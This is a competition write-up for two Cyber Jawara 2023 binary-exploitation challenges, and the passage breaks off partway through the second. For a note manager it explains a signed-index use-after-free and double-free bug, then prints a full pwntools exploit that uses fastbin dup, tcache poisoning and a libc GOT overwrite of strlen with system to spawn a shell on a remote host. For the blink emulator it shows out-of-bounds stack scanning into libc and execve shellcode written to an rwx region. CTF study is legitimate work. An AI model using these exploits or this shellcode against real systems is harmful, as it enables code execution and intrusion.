This weekend, I competed in Cyber Jawara CTF 2023 with my local team, Fidethus. In this writeup, I will share my solutions to some of the challenges that I solved.
Pwn
migrain
Description
simple migrain manager, i mean note
137.184.6.25 17001
Initial Analysis
In this challenge, we were given a binary called migrain. Let’s disassemble the binary and take a closer look at some important functions.
main
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  chunk_struct main_arr; // [rsp+0h] [rbp-650h] BYREF
  unsigned __int64 v4; // [rsp+648h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  pre_setup_17A1();
  puts("Cyber Jawara 2023: Break this Notes with Infinite Loop");
  init_main_arr_1269(&main_arr);
  main_func_1496(&main_arr);
}
This is the main function, which will call two important functions, init_main_arr_1269 and main_func_1496.
ssize_t __fastcall add_15FD(chunk_struct *main_arr)
{
  void *s; // [rsp+18h] [rbp-8h]

  printf("Payload: ");
  s = (void *)alloc_chunk_130D(main_arr);
  memset(s, 0, 0x64uLL);
  return read(0, s, 0x64uLL);
}

__int64 __fastcall alloc_chunk_130D(chunk_struct *main_arr)
{
  uint8_t v1; // al
  char *ptr_to_data; // [rsp+18h] [rbp-8h]

  ptr_to_data = (char *)malloc(8uLL);
  *(_QWORD *)ptr_to_data = malloc(0x64uLL);
  v1 = main_arr->count++;
  main_arr->chunks[v1] = ptr_to_data;
  return *(_QWORD *)ptr_to_data;
}
So, the add function allocates two chunks (requesting 0x8 and 0x64 bytes). The smaller chunk stores the pointer to the larger chunk, and the larger chunk stores our payload. There are a couple of interesting things that we can see here:
add doesn’t have any limit, so we can add as many chunks as we want.
However, remember that main_arr->count is a uint8_t, so if you add more chunks than a uint8_t can count (255), the count wraps back to 0.
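To make the wrap-around concrete, here is a minimal Python sketch that models main_arr->count as an 8-bit counter. The helper name next_count is hypothetical; it only mirrors the count++ on a uint8_t seen in the decompilation.

```python
def next_count(count: int) -> int:
    """Model `count++` on a uint8_t: the value wraps modulo 256."""
    return (count + 1) & 0xFF


count = 0
for _ in range(256):  # 256 calls to add()
    count = next_count(count)

print(count)  # 0: the counter is back where it started
```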
unsigned __int64 __fastcall destroy_1705(chunk_struct *main_arr)
{
  int idx; // [rsp+14h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Enter the index of the note to destroy: ");
  if ( !(unsigned int)__isoc99_scanf("%d", &idx) )
    exit(1);
  check_destroy_13D1((unsigned __int8 *)main_arr, idx);
  main_arr->chunks[idx] = 0LL;
  return v3 - __readfsqword(0x28u);
}

void __fastcall check_destroy_13D1(chunk_struct *main_arr, uint8_t idx)
{
  if ( idx >= main_arr->count || !main_arr->chunks[idx] )
  {
    puts("Note index out of range.");
    exit(1);
  }
  free(*(void **)main_arr->chunks[idx]);
}
Notice that the destroy function frees the larger chunk (which contains our payload), then sets chunks[idx] to 0. This seems okay, but this function contains the main vulnerability that we will abuse later. The bug is very subtle: if you send a negative value, destroy treats idx as a signed int, but check_destroy receives it as a uint8_t, so it is truncated to an unsigned 8-bit value.
This means that if we destroy a note with a negative index, check_destroy still frees the larger chunk of chunks[(uint8_t)idx], but the entry that gets nullified is chunks[idx] with the signed value. The entry chunks[(uint8_t)idx] is never cleared, which leads to Use-After-Free and Double Free.
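The mismatch is easy to see with a few lines of Python. This is only a sketch of the integer arithmetic: as_uint8 is a hypothetical helper that mimics the truncation to uint8_t, and neg is the same helper used in the exploit script.

```python
def as_uint8(idx: int) -> int:
    """Truncate a C int to uint8_t, as happens when idx is passed to check_destroy."""
    return idx & 0xFF


def neg(x: int) -> int:
    """Negative index that aliases slot x after truncation to 8 bits."""
    return x - 256


idx = neg(198)              # -58, the value we type at the prompt
freed_slot = as_uint8(idx)  # slot whose data chunk is freed by check_destroy
cleared_slot = idx          # slot that destroy() sets to NULL

print(idx, freed_slot, cleared_slot)  # -58 198 -58
```

Since freed_slot and cleared_slot differ, chunks[198] keeps pointing at freed memory.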
Now that we know the vulnerability, we need to think about a strategy to exploit this binary.
Solution
First, with the UAF bug, we can easily leak a heap address: after a chunk is freed through a negative index, we can still view its content, which now contains the mangled pointer to the next freed chunk.
Second, observe that we can only allocate chunks of size 0x70. This means that once we fill tcache[0x70], the next freed chunks will go to the fastbin. With the Double Free that we can also trigger, we can do a fastbin dup attack with the following sequence:
free(a)
free(b)
free(a)
The above sequence makes the fastbin linked list look like a -> b -> a, and this can be abused later.
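As a side note, the 0x70 chunk size mentioned above follows from how glibc rounds a request on x86-64: add the 8-byte size field, round up to 16 bytes, and enforce a 0x20 minimum. The sketch below reimplements that rounding; the constant names mirror glibc's, but the function itself is only an illustration.

```python
SIZE_SZ = 8                           # sizeof(size_t) on x86-64
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1   # 16-byte alignment
MINSIZE = 0x20                        # smallest possible chunk


def request2size(req: int) -> int:
    """Chunk size that glibc uses for a malloc(req) call on x86-64."""
    size = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
    return max(size, MINSIZE)


print(hex(request2size(0x64)))  # 0x70, the payload chunk
print(hex(request2size(0x8)))   # 0x20, the pointer chunk
```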
Stage 1: Leak heap & trigger fastbin dup
First, let’s start by creating some helpers to make our life easier.
Our first targets are a heap leak and tcache poisoning. Let’s start by allocating a lot of chunks, so that we can use negative indexes to trigger the UAF and Double Free later.
for i in range(200):
    print(i)
    add(p8(i)*8)
After allocating a lot of chunks, let’s fill the tcache.
# Fill tcache
for i in range(7):
    destroy(i)
Let’s check in gdb to ensure that tcache[0x70] is full.
Because tcache[0x70] is now full, every chunk that we free from now on goes to the fastbin. Now, we can trigger the fastbin dup as explained before. We need to use negative indexes to trigger the double free and the UAF (to leak the heap address).
As you can see, we successfully triggered it, and we also got a heap leak from it. The next stage is to leak a libc address.
Stage 2: Leak LIBC address
Before trying to get a libc leak, you might be wondering why we need the fastbin dup at all. To see what we can do with it, let’s empty the tcache first, because glibc serves allocations from the tcache before it touches the freed chunks stored in the fastbin.
I will explain the fake_chunk later; for now, let’s focus on what happens after we empty the tcache. After emptying it, let’s check the state of the bins.
Now, what will happen if we allocate a new chunk with this fastbin state? Let’s say that the content of the new chunk is the mangled pointer of some address in the heap. In this case, I set the content of the new chunk to the mangled form of leaked_heap-0x6e80, which is 0x5613ef239300.
As you can see, tcache[0x70] now contains 3 items, and the last item is the address that we supplied while allocating the new chunk. What happened is that the libc _int_malloc code contains logic that, during an allocation, walks the fastbin and moves its chunks to the tcache.
Now, you might wonder why tcache[0x70] contains 3 items instead of 2: the fastbin had 3 items and we allocated 1 chunk, so 2 should remain. The reason is the fastbin dup that we triggered. I will explain what happened in detail.
Let’s start by going through the _int_malloc code below:
static void *_int_malloc(mstate av, size_t bytes)
{
  ...
  if ((unsigned long)(nb) <= (unsigned long)(get_max_fast()))
  {
    idx = fastbin_index(nb);
    mfastbinptr *fb = &fastbin(av, idx);
    mchunkptr pp;
    victim = *fb;

    if (victim != NULL)
    {
      if (__glibc_unlikely(misaligned_chunk(victim)))
        malloc_printerr("malloc(): unaligned fastbin chunk detected 2");

      if (SINGLE_THREAD_P)
        *fb = REVEAL_PTR(victim->fd);
      else
        REMOVE_FB(fb, pp, victim);
      if (__glibc_likely(victim != NULL))
      {
        size_t victim_idx = fastbin_index(chunksize(victim));
        if (__builtin_expect(victim_idx != idx, 0))
          malloc_printerr("malloc(): memory corruption (fast)");
        check_remalloced_chunk(av, victim, nb);
#if USE_TCACHE
        /* While we're here, if we see other chunks of the same size,
           stash them in the tcache. */
        size_t tc_idx = csize2tidx(nb);
        if (tcache && tc_idx < mp_.tcache_bins)
        {
          mchunkptr tc_victim;

          /* While bin not empty and tcache not full, copy chunks. */
          while (tcache->counts[tc_idx] < mp_.tcache_count
                 && (tc_victim = *fb) != NULL)
          {
            if (__glibc_unlikely(misaligned_chunk(tc_victim)))
              malloc_printerr("malloc(): unaligned fastbin chunk detected 3");
            if (SINGLE_THREAD_P)
              *fb = REVEAL_PTR(tc_victim->fd);
            else
            {
              REMOVE_FB(fb, pp, tc_victim);
              if (__glibc_unlikely(tc_victim == NULL))
                break;
            }
            tcache_put(tc_victim, tc_idx);
          }
        }
#endif
        void *p = chunk2mem(victim);
        alloc_perturb(p, bytes);
        return p;
      }
    }
  }
  ...
}
First, when we allocate a new 0x70 chunk, _int_malloc fetches the first pointer in the fastbin linked list (victim) and later returns it as the allocated chunk.
Next, the code below reads the fd pointer of each fastbin chunk and keeps walking the linked list, moving chunks into the tcache, until either the tcache is full or the fastbin is empty (the next pointer is NULL).
...
*fb = REVEAL_PTR(victim->fd);
...
/* While we're here, if we see other chunks of the same size,
   stash them in the tcache. */
size_t tc_idx = csize2tidx(nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
  mchunkptr tc_victim;

  /* While bin not empty and tcache not full, copy chunks. */
  while (tcache->counts[tc_idx] < mp_.tcache_count
         && (tc_victim = *fb) != NULL)
  {
    if (__glibc_unlikely(misaligned_chunk(tc_victim)))
      malloc_printerr("malloc(): unaligned fastbin chunk detected 3");
    if (SINGLE_THREAD_P)
      *fb = REVEAL_PTR(tc_victim->fd);
    else
    {
      REMOVE_FB(fb, pp, tc_victim);
      if (__glibc_unlikely(tc_victim == NULL))
        break;
    }
    tcache_put(tc_victim, tc_idx);
  }
}
#endif
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
Now, let’s walk through what happened in our case due to the fastbin dup, based on the above glibc code:
First, let’s say that the current state of our fastbin is:
a->b->a.
When malloc is called, glibc takes the first pointer in the fastbin (which is a) and stores it in the victim variable.
fb is a pointer to the fastbin head, and *fb is immediately advanced to victim->fd, so *fb is now b.
Then, the stash loop checks whether *fb is NULL. It is not (it is b), so glibc starts moving the fastbin chunks to the tcache. Below is the step-by-step of what the loop does:
Iteration 1: tc_victim is b. Read b->fd (which is a) and store it in *fb (*fb=a).
Move b to tcache.
Now, tcache[0x70] = b, with count = 1.
Because the tcache was empty, tcache_put overwrites b’s next pointer (the same field as fd) with NULL.
Iteration 2: tc_victim is a. Read a->fd (which is b, due to the fastbin dup that we caused before) and store it in *fb (*fb=b).
Move a to tcache.
Now, tcache[0x70] = a -> b, with count = 2.
Due to the move, tcache_put sets a’s next pointer to b, the previous tcache head.
Iteration 3: tc_victim is b. Read b->fd, which is NULL because it was cleared in iteration 1, and store it in *fb (*fb=NULL).
Move b to tcache again.
Now, tcache[0x70] = b -> a -> b, with count = 3.
Due to the move, tcache_put sets b’s next pointer to a.
Now, because *fb is NULL, the loop stops, and malloc returns victim (which is a).
Remember that a is still part of tcache[0x70], so now we have an overlap between an active chunk and a tcache chunk.
This means that the value we write while allocating this chunk is also used as a tcache next pointer.
Before we fill the allocated chunk, the tcache state is b->a->b.
After we fill the allocated chunk, the tcache linked list changes to b->a-><our_controlled_value>.
Based on the above scenario, we have successfully poisoned the tcache, and the third allocation will be placed at any address that we choose.
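The walk-through above can be replayed with a small simulation. This is a simplified model, not glibc code: chunks are plain names, fd is a dictionary from a chunk to its next pointer, and safe-linking, the tcache key, and alignment checks are all ignored. The function names are hypothetical.

```python
def simulate_fastbin_stash(fd, head, tcache_limit=7):
    """Model the fastbin path of _int_malloc, including the tcache stash loop."""
    fd = dict(fd)
    victim = head
    fb = fd[victim]                    # *fb = victim->fd
    tcache_head, count = None, 0
    while count < tcache_limit and fb is not None:
        tc_victim = fb
        fb = fd[tc_victim]             # *fb = tc_victim->fd
        fd[tc_victim] = tcache_head    # tcache_put: e->next = old head
        tcache_head = tc_victim
        count += 1
    return victim, tcache_head, count, fd


def walk(fd, head, count):
    """List the chunks that the next `count` tcache allocations would return."""
    out, cur = [], head
    for _ in range(count):
        out.append(cur)
        cur = fd.get(cur)
    return out


# Fastbin after free(a); free(b); free(a): a -> b -> a
victim, head, count, fd = simulate_fastbin_stash({"a": "b", "b": "a"}, "a")
print(victim, count, walk(fd, head, count))  # a 3 ['b', 'a', 'b']

fd["a"] = "target"           # our payload lands in a's next pointer
print(walk(fd, head, count))  # ['b', 'a', 'target']
```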
Back to our payload, what is the leaked_heap-0x6e80 address (we will call it target)? Why do we use it to poison the last tcache item? The reason is that we want to allocate an overlapping chunk, and that address is located in the middle of an existing chunk.
If we allocate a new chunk at that position, we can write 0x64 bytes starting from that address, which lets us overwrite the size field of the adjacent chunk below it.
This is how we will leak the libc address. We can change the size of the overlapped 0x70 chunk to 0x461 (or any large size, as long as chunk_address+size points to another valid chunk), so that when we destroy the forged chunk, it goes to the unsorted bin, and with the UAF bug, we can get a libc leak.
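To see why a forged size of 0x461 ends up in the unsorted bin while 0x71 does not, here is a rough classifier. It assumes glibc's default limits on x86-64 (tcache covers chunks up to 0x410 with 7 entries per bin, fastbins cover chunks up to 0x80) and ignores consolidation with the top chunk and mmapped chunks, so treat it as an approximation.

```python
TCACHE_MAX_CHUNK = 0x410   # default largest chunk size served by tcache
TCACHE_COUNT = 7           # default entries per tcache bin
FASTBIN_MAX_CHUNK = 0x80   # default global_max_fast on x86-64


def bin_for_free(size_field: int, tcache_entries: int = 0) -> str:
    """Guess which bin free() picks for a chunk with this size field."""
    size = size_field & ~0x7   # strip the three flag bits
    if size <= TCACHE_MAX_CHUNK and tcache_entries < TCACHE_COUNT:
        return "tcache"
    if size <= FASTBIN_MAX_CHUNK:
        return "fastbin"
    return "unsorted"


print(bin_for_free(0x71, tcache_entries=0))   # tcache
print(bin_for_free(0x71, tcache_entries=7))   # fastbin
print(bin_for_free(0x461, tcache_entries=0))  # unsorted
```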
Another thing to notice is that target resides inside the fake_chunk that we created while emptying the tcache, and I carefully crafted its value to ensure that the tcache won’t be corrupted. If you revisit the current tcachebins:
We can see that the last item points to address 0x0. This is because I specifically set the value at target to the mangled pointer of address 0x0 (which in this case is 0x00000005613ef239) when crafting the fake_chunk.
Now, let’s allocate this chunk and change the size of the 0x70 chunk below it to get a libc leak.
# Use 2 tcache items
add(b'b')
add(b'c')

# Allocate our fake chunk, where this will change the size of the
# below chunk to 0x460
fake_chunk = b'a'*0x20
fake_chunk += p64(0) + p64(0x21)
fake_chunk += p64(leaked_heap-0x6e30) + p64(0)
fake_chunk += p64(0) + p64(0x461)
fake_chunk += p64(0)
add(fake_chunk)
Checking in gdb, we can see that the size of the chunk below was overwritten with 0x461.
After this, we can move on to the final stage, which is controlling RIP.
Stage 3: RIP Control
To recap, we now have:
heap address
libc address
Now, we need to get RIP Control, so that we can spawn a shell. Remember that with the previous fastbin dup trick, we actually can create a new tcache chunk in any position. So, for the final step, we only need to repeat the trick.
First, let’s clean up the bins by allocating a lot of new chunks.
for i in range(0x120):
    print(i)
    add(p64(i)*4)
Now, we repeat the same trick that we used before. But before that, what target should we aim at to get RIP control?
During the competition, I decided to allocate a new tcache chunk at the libc GOT, so that I could overwrite libc’s strlen GOT entry with system. I did this because the view function calls printf, and based on my observation in gdb, it internally calls strlen(chunk). So, if we are able to overwrite libc’s strlen GOT entry with system, calling view on a chunk that contains the string /bin/sh will spawn a shell!
# Fulfill tcache
for i in range(7):
    destroy(i)

destroy(neg(198))
destroy(neg(197))
destroy(neg(198))

# Leak new heap
out = u64(view(197)[:6].ljust(8, b'\x00'))
leaked_heap = demangle(out)
info(f'{hex(leaked_heap)= }')

# Empty tcache
for i in range(7):
    add(p64(i))

# Tcache poisoning
target = libc.address+0x1f6080 # strlen GOT entry address
add(p64(mangle(leaked_heap, target)))

# Use 2 tcache items
add(b'b')
add(b'/bin/sh\x00')

# Poison the libc GOT entries, because this
# allocation will allocate a new chunk in the target,
# which is strlen GOT entry address
# Remember that add function memset the chunk to 0, so we
# need to ensure the other GOT entry near strlen remains the
# same
payload = p64(libc.symbols['system'])
payload += p64(libc.address+(0x7f00ff976890-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff972710-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff973db0-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff976b80-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff973660-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff9719c0-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff822180-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff822190-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff8ad6d0-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff970b60-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff974190-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff8221d0-0x7f00ff800000))
add(payload[:0x64])

# View index -4 manually
r.interactive()
Now, if we call view on the chunk that contains the /bin/sh string, we will spawn a shell.
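A small piece of arithmetic explains why the GOT payload is 13 quadwords long but is cut with payload[:0x64]. The add function zeroes and then reads exactly 0x64 bytes, so every GOT slot touched by that write has to be restored. The sketch below only does the division; the constant names are mine.

```python
ENTRY_SIZE = 8    # one GOT slot on amd64
WRITE_LEN = 0x64  # bytes that add() clears and then reads

full_entries, leftover = divmod(WRITE_LEN, ENTRY_SIZE)
print(full_entries, leftover)  # 12 4

# 12 whole slots (system plus 11 restored entries) and the low 4 bytes
# of a 13th slot are written, so 13 values are prepared and then truncated.
entries_needed = full_entries + (1 if leftover else 0)
print(entries_needed)  # 13
```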
from pwn import p64, u64, p32, u32
from pwn import *
import warnings

exe = ELF("migrain_patched")
libc = ELF("./libc.so.6")
# ld = ELF("./ld-2.37.so")
context.binary = exe
context.arch = 'amd64'
context.encoding = 'latin'
context.log_level = 'INFO'
warnings.simplefilter("ignore")

remote_url = "137.184.6.25"
# remote_url = 'localhost'
remote_port = 17001
gdbscript = '''
'''

def conn():
    if args.LOCAL:
        r = process([exe.path])
        if args.PLT_DEBUG:
            # gdb.attach(r, gdbscript=gdbscript)
            pause()
    else:
        r = remote(remote_url, remote_port)
    return r

def demangle(val, is_heap_base=False):
    if not is_heap_base:
        mask = 0xfff << 52
        while mask:
            v = val & mask
            val ^= (v >> 12)
            mask >>= 12
        return val
    return val << 12

def mangle(heap_addr, val):
    return (heap_addr >> 12) ^ val

r = conn()

# Max size = 0x64, chunk_size = 0x70
def add(payload):
    r.sendlineafter(b'>> ', b'1')
    r.sendafter(b'Payload: ', payload)

def view(idx):
    r.sendlineafter(b'>> ', b'2')
    r.sendlineafter(b'Index: ', str(idx).encode())
    r.recvuntil(b'Data: ')
    out = r.recvline().strip()
    return out

def destroy(idx):
    r.sendlineafter(b'>> ', b'3')
    r.sendlineafter(b'destroy: ', str(idx).encode())

def neg(x):
    return x-256

# Max 0xff
for i in range(200):
    add(p8(i)*8)

# Fulfill tcache
for i in range(7):
    destroy(i)
print(f'Fulfill tcache')
pause()

destroy(neg(198))
destroy(neg(197))
destroy(neg(198))
print(f'fastbin dup')
pause()

out = u64(view(198)[:6].ljust(8, b'\x00'))
leaked_heap = demangle(out)
info(f'{hex(leaked_heap)= }')
pause()

target = leaked_heap-0x6e80
info(f'{hex(target)= }')

# Empty tcache
for i in range(7):
    fake_chunk = b'a'*0x30
    fake_chunk += p64(0) + p64(0x31)
    fake_chunk += p64(mangle(target, 0x0))
    add(fake_chunk)
print('tcache empty')
pause()

add(p64(mangle(leaked_heap, target)))
print('finished allocating a new chunk')
pause()

# Use 2 tcache items
add(b'b')
add(b'c')

# Allocate our fake chunk, where this will change the size of the
# below chunk to 0x460
fake_chunk = b'a'*0x20
fake_chunk += p64(0) + p64(0x21)
fake_chunk += p64(leaked_heap-0x6e30) + p64(0)
fake_chunk += p64(0) + p64(0x461)
fake_chunk += p64(0)
add(fake_chunk)
print(f'change chunk size')
pause()

destroy(neg(205))
out = u64(view(205)[:6].ljust(8, b'\x00'))
leaked_libc = out
info(f'{hex(leaked_libc)= }')
libc.address = leaked_libc - (libc.symbols['main_arena']+96)
info(f'{hex(libc.address)= }')
pause()

# Cleanup unsorted_bin by allocating a lot of new chunks
for i in range(0x120):
    print(i)
    add(p64(i)*4)
print(f'allocate a lot of new chunks')
pause()

# Fulfill tcache
for i in range(7):
    destroy(i)

destroy(neg(198))
destroy(neg(197))
destroy(neg(198))

# Leak new heap
out = u64(view(197)[:6].ljust(8, b'\x00'))
leaked_heap = demangle(out)
info(f'{hex(leaked_heap)= }')

# Empty tcache
for i in range(7):
    add(p64(i))

# Tcache poisoning
target = libc.address+0x1f6080 # strlen GOT entry address
add(p64(mangle(leaked_heap, target)))

# Use 2 tcache items
add(b'b')
add(b'/bin/sh\x00')

# Poison the libc GOT entries, because this
# allocation will allocate a new chunk in the target,
# which is strlen GOT entry address
# Remember that add function memset the chunk to 0, so we
# need to ensure the other GOT entry near strlen remains the
# same
payload = p64(libc.symbols['system'])
payload += p64(libc.address+(0x7f00ff976890-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff972710-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff973db0-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff976b80-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff973660-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff9719c0-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff822180-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff822190-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff8ad6d0-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff970b60-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff974190-0x7f00ff800000))
payload += p64(libc.address+(0x7f00ff8221d0-0x7f00ff800000))
add(payload[:0x64])

# View index -4 manually
r.interactive()
Flag: CJ2023{95b7d2fa59d0fc9372d62b83b5250bc2}
pinkeye
Description
cant stop blinking when you got pinkeye
137.184.6.25 17003
Initial Analysis
In this challenge, we were given a binary called blink and a Dockerfile to build it locally. Taking a look in the given Dockerfile, we can see that blink is actually taken from an open source repository. Based on the information in the repository, blink is a virtual machine that can be used to emulate x86-64 programs.
I tried cloning the repository and reading the source code, but the codebase is large and I didn’t want to read all of it. So, I decided to approach this challenge as a black box: create a simple ELF, feed it to the blink binary, and observe its behavior using gdb.
Setup Debugging Environment
First, we need to set up the debugging environment. During the competition, debugging directly inside the docker container helped me a lot, because the memory layouts on my local machine and in the container are different. So, let’s start by modifying the given Dockerfile and docker-compose.yml so that we can debug easily.
For the Dockerfile, let’s remove user 1000 and install gdb and my favorite extension, pwndbg. Below is the modified Dockerfile.
Now, build this container, and we will be able to debug in an environment that is as close as possible to the remote one. We can simply open a bash shell in the container, then run gdb:
docker exec -it pinkeye_blink_1 /bin/bash
root@7c95c1ab911f:/app# LC_CTYPE=C.UTF-8 gdb blink
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 151 pwndbg commands and 39 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $ida GDB functions (can be used with print/break)
Reading symbols from blink...
(No debugging symbols found in blink)
------- tip of the day (disable with set show-tips off) -------
Use GDB's dprintf command to print all calls to given function. E.g. dprintf malloc, "malloc(%p)\n", (void*)$rdi will print all malloc calls
pwndbg>
Blackbox Testing
To do the blackbox testing, I started by creating this very simple assembly code:
The above assembly can be used to observe where blink stores the emulated register values. I put an infinite loop at the end so that the program keeps running and we can easily attach gdb to the blink process and observe its behavior.
We can compile the above assembly with this command:
With this script, we can easily edit the assembly directly in the script, and then running the script will compile our assembly code and send it to the local container.
Let’s run it and observe it via gdb. To do that, after running the above script, call ps aux to get the PID of the blink process that is currently emulating our input.
pwndbg> !ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2888 1040 ? Ss 15:47 0:00 /bin/sh -c /ynetd -p 13337 "timeout 60 python3 -u ./runner.py 2>/dev/null"
root 7 0.0 0.0 2644 1008 ? S 15:47 0:00 /ynetd -p 13337 timeout 60 python3 -u ./runner.py 2>/dev/null
root 62 0.0 0.0 5000 3848 pts/0 Ss 15:48 0:00 /bin/bash
root 74 0.1 1.0 1042960 80644 pts/0 Sl+ 15:48 0:00 gdb blink
root 92 0.0 0.0 2888 972 ? Ss 15:52 0:00 sh -c timeout 60 python3 -u ./runner.py 2>/dev/null
root 93 0.0 0.0 2796 1036 ? S 15:52 0:00 timeout 60 python3 -u ./runner.py
root 94 0.0 0.1 15292 10740 ? S 15:52 0:00 python3 -u ./runner.py
root 95 102 0.0 164312 2188 ? R 15:52 0:22 /app/blink /tmp/tmpviac9u7x
root 98 0.0 0.0 2888 1064 pts/0 S+ 15:52 0:00 sh -c ps aux
root 99 0.0 0.0 7436 1596 pts/0 R+ 15:52 0:00 ps aux
pwndbg> attach 95
Attaching to program: /app/blink, process 95
Now that it is attached, let’s observe it. First, we want to know where blink stores the registers. We can simply search memory for the register values that we set.
Checking the addresses found above one by one and looking at the values nearby, we can see that the first address found in the heap is the location that blink uses to store the emulated register values.
Now, observe that among the registers, there is an interesting value, 0x00007fd6833dfea0. Checking the memory mappings of blink below, we can see that this value is adjacent to the libc base address.
Now, the question is: what is that value used for? My hypothesis when I saw it was that it is the emulated rsp. To confirm this, let’s modify our assembly to copy rsp into r9, then re-check the emulated register values in gdb (simply repeat the steps above).
It is indeed the rsp of the emulated binary! This means that we can easily get the libc base address, because one of our emulated program’s register values is adjacent to it.
Now, we need to check whether we can increase this rsp value until it points into the libc area, so that we can load and store libc memory through our emulated registers. If we can, the vulnerability in the blink binary is an out-of-bounds access outside the memory allocated for the emulated program. Let’s test this hypothesis by crafting new assembly.
Before crafting the assembly, I first assumed that the offset between the emulated rsp value and the libc base address would be the same in my local container and in the remote container. However, during testing, I observed that the offset was different. This means that I couldn’t simply add a static offset to rsp to make it point to libc.
So, in order to make our emulated rsp point to the libc area, my strategy is to increase rsp by 8 at a time, and then check whether the content matches the first 8 bytes of the libc file, i.e. the start of its ELF header (0x03010102464c457f). If there is no crash and the content matches, that means:
Our rsp now points to the libc area.
We have OOB access, because we can load the content at rsp even though it already points outside of the emulated area (in this case, into the libc area).
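The 8-byte signature used above is simply the start of the ELF identification bytes read as a little-endian quadword. The snippet below rebuilds it; the field meanings in the comments come from the ELF format (class 2 is 64-bit, data 1 is little-endian, version 1, OS ABI 3 is GNU/Linux).

```python
E_IDENT_PREFIX = bytes([
    0x7F, ord("E"), ord("L"), ord("F"),  # ELF magic
    2,  # EI_CLASS: 64-bit
    1,  # EI_DATA: little-endian
    1,  # EI_VERSION: current
    3,  # EI_OSABI: GNU/Linux
])

signature = int.from_bytes(E_IDENT_PREFIX, "little")
print(hex(signature))  # 0x3010102464c457f (hex() drops the leading zero)
```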
Below is the new assembly that I crafted to check it:
The above code keeps increasing rsp until the content at rsp equals the first 8 bytes of libc; once they are equal, the emulated rsp points to the libc base. If the program keeps running without crashing, the code works as intended.
Running the above code, the program kept running, which confirms my hypothesis: we indeed have OOB access outside of the emulated binary’s memory. If you want to double check, you can attach gdb to the process again and check the emulated rsp value like we did before, to ensure that it has changed to the libc base.
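The scanning idea can be modeled in Python on a fake memory buffer. This is only an illustration of the loop: the real stage_1 has no upper bound and relies on every address between rsp and libc being readable, whereas this hypothetical scan_for_magic stops at the end of the buffer.

```python
import struct

MAGIC = 0x03010102464C457F  # first 8 bytes of libc as a little-endian qword


def scan_for_magic(memory: bytes, start: int) -> int:
    """Step forward 8 bytes at a time until the qword at the cursor is MAGIC."""
    off = start
    while off + 8 <= len(memory):
        (qword,) = struct.unpack_from("<Q", memory, off)
        if qword == MAGIC:
            return off
        off += 8
    return -1


# 0x40 bytes of "stack", then a fake libc header.
fake_memory = b"\x00" * 0x40 + struct.pack("<Q", MAGIC) + b"\x00" * 0x10
print(hex(scan_for_magic(fake_memory, 0x10)))  # 0x40
```

Note that the scan only works when the starting address is 8-byte aligned relative to the target, which holds for a normally aligned rsp and a page-aligned libc base.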
One more thing to observe: checking the blink memory mappings, we can see that there is an rwx region adjacent to the blink PIE base address.
To summarize, from our first black-box analysis of the behavior in gdb, we have two important pieces of information:
We have OOB access abusing the emulated rsp value that is adjacent to libc.
We have rwx region.
Now, let’s think about how to use this information to craft our solution.
Solution
Stage 1 & Stage 2: Find LIBC address & PIE Base
Now that we have OOB access to the libc area, I want to leak the PIE base address, because with it we can calculate the address of the rwx region that we saw before, and then put shellcode in it. Observing in gdb again, I noticed that libc_base-0x001d10 contains the PIE base address.
Now that we have the PIE base, let’s start crafting stage_3, which writes shellcode to the rwx region of blink.
Stage 3: Write shellcode to RWX region
Observe that the rwx region is at a constant offset from the PIE base, which is 0x033000. I picked an arbitrary offset inside it and decided to put my shellcode at pie_base+0x033000+0x150. Now the question is, what should our shellcode be?
Observe that runner.py runs blink via subprocess, and based on my experience, we can’t get an interactive shell this way. So, I decided to craft shellcode that does execve("/bin/sh", ["/bin/sh", "-c", "cat /f*"]), which directly prints the flag when it is executed. Let’s modify our script to put this shellcode in the rwx region.
from pwn import p64, u64, p32, u32
from pwn import *
import os

context.arch = 'amd64'

# execve("/bin/sh", ["/bin/sh", "-c", "cat /f*"])
cat_flag_sc = asm('''
mov rsi, 0x68732f6e69622f
push rsi
mov rdi, rsp
mov rsi, 0x2a662f20746163
push rsi
mov r10, rsp
mov rsi, 0x632d
push rsi
mov r11, rsp
push 0x0
push r10
push r11
push rdi
mov rsi, rsp
xor rdx, rdx
mov rax, 0x3b
syscall
''')

shellcode_payload = ''
